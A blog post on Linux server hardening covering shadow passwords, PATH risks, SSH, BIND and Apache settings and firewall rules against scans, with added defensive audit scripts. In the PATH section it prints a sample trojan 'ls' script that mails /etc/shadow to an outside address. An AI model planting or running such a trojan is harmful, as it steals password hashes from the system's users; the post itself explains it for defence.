Security Tips for Linux (Server) (Part 1)

I haven't published anything on the blog for a long time, and I would like to share some tips taken from a book (among others). I found it at the University and have just read it, and although it is honestly a bit outdated and the techniques shown are unlikely to work given how systems have evolved, they are still interesting points to show. (ISBN 9788448140502)

I want to clarify that these are tips for a Linux system used as a server, at medium or perhaps large scale, since at the desktop-user level, although they can be applied, they would not be very useful.

I also warn you that these are simple, quick tips and I will not go into much detail, although I plan to write a more specific and detailed post on one particular topic. But I will see about that later. Let's begin.

Password policies.

Although it sounds like a cliché, having a good password policy makes the difference between a vulnerable system and one that is not. Attacks such as "brute force" take advantage of a bad password to gain access to a system. The most common tips are:

  • Combine upper-case and lower-case letters.
  • Use special characters.
  • Numbers.
  • More than 6 characters (preferably more than 8).

Besides this, let's consider two essential files: /etc/passwd and /etc/shadow.

An important point is that the /etc/passwd file, besides giving us the user name, the UID, the home folder, the shell, etc., in some cases also shows the user's encrypted password.

Let's look at its typical structure.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

user:cryptkey:uid:gid::path:bash

The main problem here is that this particular file has the permissions -rw-r--r--, which means it is readable by any user on the system, and once someone has the encrypted password it is not very hard to work out the real one.

That is why the /etc/shadow file exists. This is the file where all user passwords are stored, among other things. This file has the necessary permissions so that no user can read it.

To fix this, we must go to the /etc/passwd file and change the encrypted password to an "x"; this keeps the password only in our /etc/shadow file.

desdelinux:x:500:501::/home/usuario1:/bin/bash
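
The check described above as a script: it flags accounts whose password field in passwd-format data is not shadowed, and tests whether a file is readable by every user. This is an added example, not code from the original post; the function names, the finding labels and the sample accounts other than the desdelinux line are constructed for illustration.

```shell
#!/bin/sh
# Added example: find password fields in passwd-format data that are not shadowed.

# Constructed sample in /etc/passwd format (only the desdelinux line is from the post).
sample_passwd() {
cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
backup::34:34::/var/backups:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
EOF
}

# Read passwd-format lines on stdin and print one finding per problem account.
audit_passwd() {
    awk -F: '
        /^#/ || NF == 0 { next }                       # skip comments and blanks
        NF != 7 { print "MALFORMED line " NR; next }   # passwd has 7 fields
        $2 == "" { print "EMPTY_PASSWORD " $1; next }  # no password required
        $2 != "x" && $2 !~ /^[*!]/ { print "HASH_IN_PASSWD " $1 }
    '
}

# True if FILE ($1) is readable by "other": normal for passwd, a finding for shadow.
world_readable() {
    [ -n "$(find -H "$1" -prune -perm -004 2>/dev/null)" ]
}

if [ "${1:-}" = "--system" ]; then
    audit_passwd < /etc/passwd
    if world_readable /etc/shadow; then echo "WORLD_READABLE /etc/shadow"; fi
else
    sample_passwd | audit_passwd
fi
```

Run it with `--system` to audit the live /etc/passwd and /etc/shadow. On systems with the shadow suite, `pwconv` performs the move of the password fields into /etc/shadow.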

Problems with PATH, .bashrc and others.

When a user runs a command in their console, the shell looks for that command in a list of directories contained in the PATH environment variable.

If you type "echo $PATH" in the console, it will output something like this.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Each of these folders is a place where the shell will look for the typed command in order to execute it. The "." means that the first folder to be searched is the folder from which the command is run.

Suppose there is a user "Carlos" and this user wants to "do evil." This user could leave a file called "ls" in his home folder, and in this file run commands such as:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

And if the root user, for whatever reason, tries to list the folders inside carlos's folder (since the shell looks for the command in that same folder first), he will unknowingly send the file with the passwords to that e-mail address; the folders will then be listed, and he will not find out until much later.

To avoid this, we must remove the "." from the PATH variable.

Likewise, files such as /.bashrc, /.bashrc_profile and ./.login should be audited to check that there is no "." in the PATH variable; in fact, from files like these the target of a specific command can be changed.
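
The audit and the fix described above, as an added example that is not part of the original post: `audit_path` reports every PATH entry that resolves to the current directory or that any user can write into, and `clean_path` keeps only absolute entries. It goes slightly beyond the "." case in the text by also catching empty entries (a leading, trailing or doubled colon), which the shell treats the same way; the function names and finding labels are made up for the example.

```shell
#!/bin/sh
# Added example: audit a PATH value for entries that resolve to the current directory.

# Print one finding per risky entry of the PATH value given as $1.
audit_path() {
    # awk split() keeps empty entries (leading, trailing or doubled colons),
    # which the shell also treats as the current directory.
    AUDIT_P=$1 awk 'BEGIN { n = split(ENVIRON["AUDIT_P"], d, ":")
                            for (i = 1; i <= n; i++) print d[i] }' |
    while IFS= read -r dir; do
        case $dir in
            "")     echo "CWD_EMPTY_ENTRY" ;;
            .|./*)  echo "CWD_DOT $dir" ;;
            /*)     # absolute: flag directories any user can write into
                    if [ -d "$dir" ] && [ -n "$(find -H "$dir" -prune -perm -002)" ]; then
                        echo "WORLD_WRITABLE $dir"
                    fi ;;
            *)      echo "RELATIVE $dir" ;;
        esac
    done
}

# Return the PATH value with every non-absolute entry removed.
clean_path() {
    CLEAN_P=$1 awk 'BEGIN { n = split(ENVIRON["CLEAN_P"], d, ":")
        for (i = 1; i <= n; i++)
            if (d[i] ~ /^\//) out = out (out == "" ? "" : ":") d[i]
        print out }'
}

# PATH value shown in the post.
POST_PATH=".:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin"
audit_path "$POST_PATH"
clean_path "$POST_PATH"
```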

Tips for services:

SSH

  • Disable version 1 of the SSH protocol in the sshd_config file.
  • Do not allow the root user to log in via SSH.
  • The files and folders ssh_host_key, ssh_host_dsa_key and ssh_host_rsa_key should be readable only by the root user.
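
One way to check the three SSH tips above against a configuration, as an added example that is not code from the original post. The sample configuration, function names and finding labels are constructed, and the parser assumes whitespace-separated "Keyword value" lines.

```shell
#!/bin/sh
# Added example: check the SSH tips above against sshd_config text.

# Constructed sshd_config sample (not from a real host).
sample_sshd_config() {
cat <<'EOF'
# constructed example
Port 22
protocol 2,1
PermitRootLogin yes
permitrootlogin no
EOF
}

# Print the value in effect for keyword $1 in the sshd_config text on stdin.
# sshd keeps the first value it reads and matches keywords case-insensitively.
# Parsing stops at the first Match block, whose settings are conditional.
sshd_effective() {
    awk -v want="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
        { sub(/^[ \t]+/, "") }
        /^#/ || NF == 0 { next }
        tolower($1) == "match" { exit }
        tolower($1) == want { $1 = ""; sub(/^[ \t]+/, ""); print; exit }
    '
}

# Read sshd_config text on stdin and print one finding per weak setting.
audit_sshd() {
    cfg=$(cat)
    proto=$(printf '%s\n' "$cfg" | sshd_effective Protocol)
    root=$(printf '%s\n' "$cfg" | sshd_effective PermitRootLogin)
    case ",$proto," in *,1,*) echo "PROTOCOL_1_ENABLED $proto" ;; esac
    case $root in
        no) ;;
        "") echo "ROOT_LOGIN_UNSET" ;;
        *)  echo "ROOT_LOGIN_ALLOWED $root" ;;
    esac
}

# True if FILE ($1) grants no permission bits to group or other.
private_only() {
    [ "$(ls -ld "$1" | cut -c5-10)" = "------" ]
}

sample_sshd_config | audit_sshd
```

In the sample the later "permitrootlogin no" has no effect because the earlier "yes" wins. Current OpenSSH releases no longer support protocol 1, so the Protocol check matters only on legacy hosts; on a live server `sshd -T` prints the configuration actually in effect.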

BIND

  • Change the welcome banner in the named.conf file so that it does not show the version number.
  • Restrict zone transfers, and allow them only for the machines that need them.

Apache

  • Prevent the service from showing its version in the welcome banner. Edit the httpd.conf file and add or modify the lines:

ServerSignature Off
ServerTokens Prod

  • Disable automatic directory listing.
  • Configure Apache to refuse to serve sensitive files such as .htaccess, *.inc, *.jsp, etc.
  • Remove the manual pages or sample pages from the service.
  • Run Apache in a restricted environment.

Network security.

It is essential to close every possible entry point to your system from the external network. Here are some essential tips to keep intruders from scanning your network and obtaining information about it.

Block ICMP traffic

The firewall must be configured to block all types of incoming and outgoing ICMP traffic and echo replies. This way you avoid, for example, being found by a scanner that looks for live hosts across a range of IP addresses.

Avoid the TCP ping scan.

One way to scan your system is the TCP ping scan. Suppose your server runs an Apache server on port 80. An intruder could send an ACK request to that port; if the system responds, the machine is alive and the intruder will go on to scan the remaining ports.

To prevent this, your firewall should always have the "state awareness" option and should discard all ACK packets that do not correspond to an already established TCP connection or session.

Some additional tips:

  • Use an IDS to detect port scans against your network.
  • Configure the firewall so that it does not trust the source port of a connection.

This is because some scans use a "fake" source port such as 20 or 53, since many systems trust these ports because they are typical of FTP or DNS.
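
The difference between the two firewall behaviours discussed above (dropping ACK packets that belong to no connection, and not trusting source ports 20 and 53), shown on a constructed packet trace. This is an added example, not code from the original post: it is a simplified model of connection tracking, not a firewall, and the addresses, trace format and function names are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: stateless vs. stateful filtering of a constructed TCP trace.

# Constructed trace: direction, source ip:port, destination ip:port, TCP flags.
# The server is 10.0.0.5 and offers only port 80.
sample_trace() {
cat <<'EOF'
in  198.51.100.7:40000 10.0.0.5:80 S      # client opens a connection
out 10.0.0.5:80 198.51.100.7:40000 SA
in  198.51.100.7:40000 10.0.0.5:80 A      # handshake completes
in  203.0.113.9:51000 10.0.0.5:80 A       # TCP ping: ACK with no connection
in  203.0.113.9:53 10.0.0.5:22 S          # probe from "trusted" source port 53
in  203.0.113.9:20 10.0.0.5:3306 S        # probe from "trusted" source port 20
EOF
}

# For every inbound packet print the verdict of both rule sets.
filter_verdicts() {
    awk '
    /^#/ || NF < 4 { next }
    { dir = $1; src = $2; dst = $3; flags = $4
      split(src, s, ":"); split(dst, d, ":") }
    dir == "out" {
        # Connections the server opens itself are tracked for their replies.
        if (flags == "S") conn[dst, src] = 1
        next
    }
    {
        # Stateless: open service port, plus source ports 20 and 53 trusted.
        sl = (d[2] == 80 || s[2] == 20 || s[2] == 53) ? "ACCEPT" : "DROP"
        # Stateful: a SYN may open a connection to port 80 only; every other
        # packet must belong to a connection that is already tracked.
        if (flags == "S" && d[2] == 80) { conn[src, dst] = 1; sf = "ACCEPT" }
        else if (flags != "S" && (src, dst) in conn) sf = "ACCEPT"
        else sf = "DROP"
        print src, dst, flags, "stateless=" sl, "stateful=" sf
    }'
}

sample_trace | filter_verdicts
```

The three probe packets pass the stateless rules and are dropped by the stateful ones, while the legitimate connection passes both. On Linux netfilter the stateful half corresponds to the conntrack match, for example accepting `--ctstate ESTABLISHED,RELATED` and dropping `--ctstate INVALID`.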

NOTE: Keep in mind that most of the problems shown in this post have already been solved in almost all current distributions. But it never hurts to have the key information about these problems so that they do not happen to you.

NOTE: Later I will look at a specific topic and write a post with more detail and more up-to-date information.

Happy reading, everyone.

Thank you.



  1.   fadakarwa m

    I really like the article and I am interested in the topic; I recommend that you keep uploading content.